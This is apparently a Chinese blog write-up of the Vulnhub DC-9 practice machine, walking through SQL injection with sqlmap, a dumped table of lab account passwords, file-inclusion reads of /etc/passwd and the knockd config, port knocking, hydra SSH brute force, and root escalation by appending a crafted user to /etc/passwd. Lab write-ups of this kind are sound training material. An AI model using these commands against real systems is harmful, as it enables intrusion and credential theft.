Vulnhub靶场 DC-9

目录

一、环境搭建

二、信息收集

1、主机发现

2、指纹识别

三、漏洞复现

1、dirsearch目录探测

2、sqlmap注入测试

3、文件包含漏洞

4、Knockd敲门服务

5、ssh爆破

​​​​​​​6、提权

四、提取flag

一、环境搭建

Vulnhub靶机下载:

官网地址:https://download.vulnhub.com/dc/DC-9.zip

虚拟机:VM虚拟机 或者VBOX 导入即可

网络环境:NAT

介绍:vulnhub是个提供各种漏洞平台的综合靶场,拿到root权限才可以发现最终的flag。

二、信息收集

1 主机发现

nmap -sP 192.168.176.0/24

查看服务

nmap -A -p- -v 192.168.176.145

进入网站192.168.176.145

2、指纹识别

whatweb http://192.168.176.145/

没有发现有用信息

三、漏洞复现

1、dirsearch目录探测

dirsearch -u http://192.168.176.145/ -e php -x 400,404,503,403

http://192.168.176.145/manage.php 后台地址

2、sqlmap 注入 测试

发现搜索页面存在SQL注入,

payload:1' or 1=1 #

现在直接使用sqlmap工具来进行SQL注入攻击

sqlmap -u "http://192.168.176.145/results.php" -data "search=1" -dbs

sqlmap -u "http://192.168.176.145/results.php" -data "search=1" -D users -T UserDetails -C username,password -dump

跑出一些账号密码信息 保存一下 密码如下:

复制代码
| username  | password      |`
`+-----------+---------------+`
`| marym     |` `3kfs86sfd     |`
`| julied    |` `468sfdfsd2    |`
`| fredf     |` `4sfd87sfd1    |`
`| barneyr   | RocksOff      |`
`| tomc      | TC&TheBoyz    |`
`| jerrym    | B8m#48sd      |`
`| wilmaf    | Pebbles       |`
`| bettyr    | BamBam01      |`
`| chandlerb | UrAG0D!`       `|`
`| joeyt     | Passw0rd      |`
`| rachelg   | yN72#dsd      |`
`| rossg     | ILoveRachel   |`
`| monicag   |` `3248dsds7s    |`
`| phoebeb   | smellycats    |`
`| scoots    | YR3BVxxxw87   |`
`| janitor   | Ilovepeepee   |`
`| janitor2  | Hawaii-Five-0` `|`
`

再跑另外一个看一下

sqlmap -u "http://192.168.176.145/results.php" -data "search=1" -D Staff -T StaffDetails -dump

sqlmap -u "http://192.168.176.145/results.php" -data "search=1" -D Staff -T Users -C Password,Username -dump

856f5de590ef37314e7c3bdf6f8a66dc | admin

这里跑出一个admin账号,密码是md5加密

也可以输入yes sqlmap自带的库碰撞

MD5免费在线解密破解_MD5在线加密-SOMD5 在线解密网站,成功拿下

密码:transorbital1

3、文件包含 漏洞

看了半天,只看到这个关键词 ,存在文件包含漏洞

http://192.168.176.145/manage.php/?file=//../../../../etc/passwd

到这里 没思路了 上网看了一下思路

回头看 上面nmap扫描的这个22/tcp filtered ssh # 系统默认开放的,但是通过策略关掉了,因为被策略保护 处于关闭状态,Knockd隐藏SSH

但是这里给出的用户,密码信息 应该是可以 爆破一下ssh

4、Knockd敲门服务

4.1.利用LFI看看konckd的配置文件,可以fuzz一下/etc 目录,一般的配置文件都这个目录里。

payload:file=../../../../../etc/knockd.conf

复制代码
[options] UseSyslog [openSSH]` `sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP%` `-p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH]` `sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP%` `-p tcp --dport 22 -j ACCEPT tcpflags = syn`
`​​​​​​​​​​​​​​

找到了 特定的端口信息,7469,8475,9842,按顺序敲敲门

4.2.nmap开启敲门

第一种方法:

复制代码
nmap -p 7469 192.168.176.145`
`nmap -p 8475 192.168.176.145`
`nmap -p 9842 192.168.176.145

第二种方法:

for x in 7469 8475 9842; do nc 192.168.176.145 $x;done

4.3.现在重新nmap扫描服务看看 直接打开了

nmap -A -p- -v 192.168.176.145

​​​​​​​5、ssh爆破

5.1.前面sqlmap跑的一个表 整理成字典

5.2.hy爆破

hydra -L username.txt mark -P pass.txt ssh://192.168.176.145

跑出了两个账户

login: joeyt password: Passw0rd login: janitor password: Ilovepeepee

ssh [email protected] -p 22 ssh连接

在janitor用户发现了一个隐藏的文件夹

cd .secrets-for-putin

ls -a

存在一些密码,写入密码字典,继续爆破 之前没有出来的那些账号

5.3.ssh连接fredf

login: fredf password: B4-Tru3-001

​​​​​​​6、提权

接下来提权 查看有无sudo -l权限

sudo -l

发现fredf可以以root的身份执行

(root) NOPASSWD: /opt/devstuff/dist/test/test

是一个python文件 ,文件的意思是,读取第一个文件追加到第二个文件上

利用find指令找到这个python文件

命令:

find / -name "test.py" 2>/dev/null 寻找叫做test.py的文件

接着在/opt/devstuff/发现python源文件:test.py

代码如下:

复制代码
import sys`
`if` `len` `(sys.argv)` `!=` `3 :`
    `print` `("Usage: python test.py read append")`
`    sys.exit` `(1)`
`else :`
`    f =` `open(sys.argv[1],` `"r")`
`    output =` `(f.read())`
`    f =` `open(sys.argv[2],` `"a")`
`    f.write(output)`
`    f.close()`
`

这是一个可以写入文件的一个python程序,我们可以以root权限写入任意一个文件

所以我们接下来要以root权限在/etc/passwd中写入一个具有root权限的用户

因为在/etc/passwd中的密码都是加密过的,我们也要设计一个加密的密码

设置密码命令:

openssl passwd -1(md5加密算法) -salt(用一个随机数去加盐) admin 123456

openssl passwd -1 -salt admin 123456

生成密码:1admin$LClYcRe.ee8dQwgrFc5nz.

先把这些写入临时文件,再用test.py读取文件,追加到passwd里面

1、写入临时文件

复制代码
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0:/root:/bin/bash'` `>>/tmp/mm

2、python程序追加到etc/passwd

复制代码
sudo ./test /tmp/mm.txt  /etc/passwd

3、切换用户看看

su admin

4、交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

、提取flag

相关推荐
virelin_Y.lin10 小时前
系统与网络安全------Windows系统安全(9)
windows·web安全·系统安全·iis
上线之叁11 小时前
小迪安全110-tp框架,版本缺陷,不安全写法,路由访问,利用链
安全
计算机毕设定制辅导-无忧学长11 小时前
TDengine 权限管理与安全配置实战(二)
大数据·安全·tdengine
☞无能盖世♛逞何英雄☜13 小时前
Upload-labs靶场通关
安全
zhu128930355613 小时前
网络安全防护与挑战
网络·安全·web安全
神经毒素14 小时前
WEB安全--文件上传漏洞--36C3 CTF includer bypass
linux·安全·web安全
DPLSLAB614 小时前
数字孪生重构安全边界:无人机 “虚拟孪生体“ 的预演革命 —— 北京智慧云测构建全要素仿真体系
安全·重构·无人机
蒜白16 小时前
28--当路由器开始“宫斗“:设备控制面安全配置全解
安全·网络工程师·路由·ospf·bgp
扣脚大汉在网络17 小时前
云原生安全渗透篇
安全·云原生·dubbo
vortex518 小时前
Windows 权限配置文件解析与安全分析(GPP,GPO,LSA)
windows·安全·渗透测试